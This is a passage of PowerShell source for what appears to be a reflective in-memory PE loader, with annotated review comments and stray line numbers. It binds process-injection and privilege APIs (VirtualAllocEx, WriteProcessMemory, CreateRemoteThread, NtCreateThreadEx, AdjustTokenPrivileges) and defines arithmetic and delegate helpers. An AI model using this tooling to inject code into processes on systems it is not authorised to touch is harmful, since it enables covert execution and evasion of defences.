        $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
        $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY


        # Token/privilege structures (LUID, LUID_AND_ATTRIBUTES, TOKEN_PRIVILEGES).
        # TOKEN_PRIVILEGES is declared with room for exactly one privilege entry
        # (4 + 12 = 16 bytes).
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
        $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
        $LUID = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID


        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
        $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
        $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
        $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES


        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
        $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
        $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES

        return $Win32Types
    }
  387.  
    # Returns the winnt.h constants used elsewhere in the script — VirtualAlloc
    # allocation types and PAGE_* protections, base-relocation types, IMAGE_SCN_*
    # section flags, IMAGE_FILE_* characteristics, DllCharacteristics bits, and
    # token access rights / privilege attributes — each as a NoteProperty on a
    # plain System.Object.
    #
    # Returns: System.Object whose NoteProperties are the constants below.
    #
    # NOTE(review): PowerShell types a hex literal as [Int32] unless it does not
    # fit, so IMAGE_SCN_MEM_WRITE (0x80000000) is presumably an [Int64] while the
    # rest are [Int32]; callers that -band it against a [UInt32] field should
    # expect the widening — confirm with .IMAGE_SCN_MEM_WRITE.GetType().
    # Also note IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE here is spelled differently
    # from the IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE enum literal in
    # Get-Win32Types (same value 0x40).
    Function Get-Win32Constants
    {
        $Win32Constants = New-Object System.Object

        # Memory allocation / protection flags for VirtualAlloc(Ex) and friends.
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
        # Base-relocation entry types (upper 4 bits of each relocation word).
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
        # IMAGE_SECTION_HEADER.Characteristics bits.
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
        # IMAGE_FILE_HEADER.Characteristics and optional-header DllCharacteristics.
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
        # Token access rights, privilege attribute and the GetLastError value
        # for "thread has no impersonation token".
        $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
        $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
        $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
        $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0

        return $Win32Constants
    }
  424.  
    Function Get-Win32Functions
    {
        # Resolves every native entry point this loader uses and exposes each one as a
        # NoteProperty holding a callable delegate ($Win32Functions.<Name>.Invoke(...)).
        # Each entry follows the same three steps: Get-ProcAddress (export address) ->
        # Get-DelegateType (a Reflection.Emit delegate type with the matching signature) ->
        # Marshal.GetDelegateForFunctionPointer. No P/Invoke declaration (Add-Type) is used.
        # NOTE(review): the emitted delegate types carry no SetLastError marshalling flag, so
        # Marshal.GetLastWin32Error() read after these Invoke calls may not reflect the native
        # call's error — confirm before trusting error codes derived from it.
        # Returns: a PSObject whose members are the delegates listed below.
        $Win32Functions = New-Object System.Object

        # --- virtual memory in the current process / a target process ---
        $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
        $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
        $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc

        $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
        $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
        $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx

        # --- raw memory helpers taken from the C runtime (msvcrt.dll), not kernel32 ---
        $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
        $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
        $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy

        $memsetAddr = Get-ProcAddress msvcrt.dll memset
        $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
        $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset

        # --- module / export resolution (ANSI variants: LoadLibraryA, GetModuleHandleA) ---
        $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
        $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
        $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary

        $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
        $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
        $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress

        # Same export bound a second time with an IntPtr second argument, so the name
        # parameter can carry a non-string value (presumably an ordinal) without marshalling.
        $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress
        $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
        $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr

        $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
        $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
        $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree

        $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
        $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
        $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx

        # Last parameter is a by-ref UInt32 (lpflOldProtect); callers pass [Ref].
        $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
        $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
        $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect

        $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
        $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
        $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
        $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle

        $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
        $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
        $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary

        # --- cross-process access: handle, memory read/write, thread creation, waiting ---
        $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
        $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
        $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess

        $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
        $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
        $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject

        $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
        $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
        $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory

        $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
        $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
        $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory

        $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
        $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
        $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread

        $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
        $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
        $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread

        # --- token / privilege APIs (Advapi32) used by Enable-SeDebugPrivilege ---
        $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
        $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
        $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken

        $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
        $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
        $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread

        $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
        $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
        $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges

        $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
        $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
        $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue

        $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
        $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
        $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf


        # NtCreateThreadEx (undocumented, ntdll) is only bound when 6.0 <= OS version < 6.2
        # (Vista / Windows 7 / Server 2008 family). Create-RemoteThread repeats exactly this
        # version test before touching the member, so on other versions the property simply
        # does not exist. The 11-parameter signature below is the loader's own declaration;
        # its correctness is not verifiable from this file.
        if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
            $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
            $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr])  ([UInt32])
            $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
            $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
        }

        # Second parameter is a by-ref Bool (Wow64Process out-param).
        $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
        $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
        $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process

        $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
        $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
        $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread

        return $Win32Functions
    }
  564.  
  565.  
  566.  
  567.  
  568.  
  569.  
  570.  
  571.  
  572.  
    Function Sub-SignedIntAsUnsigned
    {
        # Computes Value1 - Value2 as if both were unsigned 64-bit quantities, wrapping
        # modulo 2^64, and returns the result reinterpreted as a signed Int64.
        # Works byte-wise on the BitConverter images with a borrow: the final borrow out of
        # the top byte is discarded, which is what produces the wraparound instead of the
        # overflow error PowerShell's signed Int64 arithmetic would raise.
        # Arguments: $Value1 - minuend (bit pattern of an unsigned value)
        #            $Value2 - subtrahend (bit pattern of an unsigned value)
        # Returns:   [Int64] holding the 64-bit two's-complement result
        # Raises:    if the two byte images differ in length (cannot happen for two Int64s;
        #            the check is defensive).
        # NOTE: index 0 is treated as the least significant byte, i.e. this assumes
        # BitConverter emits little-endian order (true on x86/x64).
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,

        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
        )

        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)

        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
        {
            $CarryOver = 0
            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
            {
                # Apply the borrow from the previous byte first; $Val may become -1 here.
                $Val = $Value1Bytes[$i] - $CarryOver

                # Borrow 256 from the next byte when this byte would go negative.
                if ($Val -lt $Value2Bytes[$i])
                {
                    $Val += 256
                    $CarryOver = 1
                }
                else
                {
                    $CarryOver = 0
                }


                # Non-negative by construction; the mask keeps only the low byte.
                [UInt16]$Sum = $Val - $Value2Bytes[$i]

                $FinalBytes[$i] = $Sum -band 0x00FF
            }
        }
        else
        {
            Throw "Cannot subtract bytearrays of different sizes"
        }

        return [BitConverter]::ToInt64($FinalBytes, 0)
    }
  619.  
  620.  
    Function Add-SignedIntAsUnsigned
    {
        # Computes Value1 + Value2 as if both were unsigned 64-bit quantities, wrapping
        # modulo 2^64, and returns the result reinterpreted as a signed Int64.
        # Byte-wise add with carry on the BitConverter images; the carry out of the top
        # byte is dropped, giving wraparound where PowerShell's Int64 addition would
        # overflow. Used throughout the loader for pointer arithmetic on IntPtr values.
        # Arguments: $Value1, $Value2 - addends (bit patterns of unsigned values)
        # Returns:   [Int64] holding the 64-bit two's-complement sum
        # Raises:    if the two byte images differ in length (defensive; both are Int64).
        # NOTE: index 0 is treated as the least significant byte (little-endian assumption).
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,

        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
        )

        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)

        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
        {
            $CarryOver = 0
            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
            {

                # Max value is 255 + 255 + 1 = 511, so a UInt16 holds it and the high
                # byte can only ever be 0x00 or 0x01.
                [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver

                $FinalBytes[$i] = $Sum -band 0x00FF

                if (($Sum -band 0xFF00) -eq 0x100)
                {
                    $CarryOver = 1
                }
                else
                {
                    $CarryOver = 0
                }
            }
        }
        else
        {
            Throw "Cannot add bytearrays of different sizes"
        }

        return [BitConverter]::ToInt64($FinalBytes, 0)
    }
  664.  
  665.  
    Function Compare-Val1GreaterThanVal2AsUInt
    {
        # Unsigned comparison of two Int64 bit patterns: returns $true only when
        # Value1 > Value2 when both are read as unsigned 64-bit values; $false when
        # Value1 <= Value2 (equality yields $false).
        # Compares the BitConverter images from the last index downwards, i.e. treats
        # index Count-1 as the most significant byte — a little-endian assumption.
        # Arguments: $Value1, $Value2 - bit patterns to compare
        # Returns:   [Bool]
        # Raises:    if the byte images differ in length (defensive; both are Int64).
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,

        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
        )

        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)

        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
        {
            # First differing byte from the top decides the result.
            for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
            {
                if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
                {
                    return $true
                }
                elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
                {
                    return $false
                }
            }
        }
        else
        {
            Throw "Cannot compare byte arrays of different size"
        }

        # All bytes equal.
        return $false
    }
  702.  
  703.  
    Function Convert-UIntToInt
    {
        # Reinterprets the bit pattern of a UInt64 as an Int64 (no range check, no
        # value change — values above Int64.MaxValue come back negative).
        # Arguments: $Value - unsigned 64-bit value
        # Returns:   [Int64] with the identical 8-byte image
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [UInt64]
        $Value
        )

        [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
        return ([BitConverter]::ToInt64($ValueBytes, 0))
    }
  715.  
  716.  
    Function Get-Hex
    {
        # Formats a numeric value as "0x" followed by zero-padded upper-case hex, with the
        # digit count derived from the runtime size of the value's own type
        # (Marshal.SizeOf * 2, e.g. 16 digits for an Int64 / 64-bit IntPtr).
        # Arguments: $Value - any value whose type Marshal.SizeOf accepts
        # Returns:   [String] such as 0x0000000000001000
        # NOTE: the value is cast to [Int64] before formatting, so a UInt64 above
        # Int64.MaxValue will fail the cast rather than print.
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        $Value
        )

        $ValueSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2
        $Hex = "0x{0:X$($ValueSize)}" -f [Int64]$Value

        return $Hex
    }
  729.  
  730.  
    Function Test-MemoryRangeValid
    {
        # Guard used before writes into the mapped image: throws unless the range
        # [StartAddress, StartAddress + Size] lies inside [PEInfo.PEHandle, PEInfo.EndAddress],
        # using the unsigned helpers so addresses above 2^63 compare correctly.
        # Arguments: $DebugString  - caller-supplied context appended to the error text
        #            $PEInfo       - object exposing PEHandle (start) and EndAddress
        #            $StartAddress - first address of the intended write
        #            $Size         - length of the intended write
        # Returns:   nothing; throws on an out-of-range request
        # NOTE: the end check is "FinalEndAddress > EndAddress", so a range ending exactly
        # at EndAddress passes; whether EndAddress is inclusive or one-past-the-end is
        # decided where PEInfo is built, not here — confirm against that code.
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [String]
        $DebugString,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $PEInfo,

        [Parameter(Position = 2, Mandatory = $true)]
        [IntPtr]
        $StartAddress,

        [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
        [IntPtr]
        $Size
        )

        [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))

        $PEEndAddress = $PEInfo.EndAddress

        # Start below the mapped image.
        if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
        {
            Throw "Trying to write to memory smaller than allocated address range. $DebugString"
        }
        # End beyond the mapped image.
        if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
        {
            Throw "Trying to write to memory greater than allocated address range. $DebugString"
        }
    }
  764.  
  765.  
    Function Write-BytesToMemory
    {
        # Copies $Bytes into unmanaged memory of the current process starting at
        # $MemoryAddress, one Marshal.WriteByte call per byte.
        # Arguments: $Bytes         - data to write
        #            $MemoryAddress - destination in this process's address space
        # Returns:   nothing
        # NOTE: no bounds or validity check is performed on the destination; the caller
        # must guarantee that $Bytes.Length bytes at $MemoryAddress are writable.
        Param(
            [Parameter(Position=0, Mandatory = $true)]
            [Byte[]]
            $Bytes,

            [Parameter(Position=1, Mandatory = $true)]
            [IntPtr]
            $MemoryAddress
        )

        for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
        {
            [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
        }
    }
  783.  
  784.  
  785.  
    Function Get-DelegateType
    {
        # Builds, at runtime, a delegate [Type] whose Invoke signature matches the given
        # parameter and return types, so an unmanaged function pointer can be wrapped with
        # Marshal.GetDelegateForFunctionPointer without any compiled P/Invoke stub.
        # Implementation: emits a transient in-memory assembly ('ReflectedDelegate') and a
        # MulticastDelegate subclass named 'MyDelegateType' with runtime-managed ctor and
        # Invoke methods. A fresh dynamic assembly is emitted on every call; nothing is cached.
        # Arguments: $Parameters - parameter types of the target function (default: none)
        #            $ReturnType - return type (default: [Void])
        # Outputs:   the created [Type] on the pipeline
        # NOTE: no UnmanagedFunctionPointer/SetLastError attribute is applied to the type,
        # which matters for callers that read Marshal.GetLastWin32Error afterwards.
        Param
        (
            [OutputType([Type])]

            [Parameter( Position = 0)]
            [Type[]]
            $Parameters = (New-Object Type[](0)),

            [Parameter( Position = 1 )]
            [Type]
            $ReturnType = [Void]
        )

        $Domain = [AppDomain]::CurrentDomain
        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
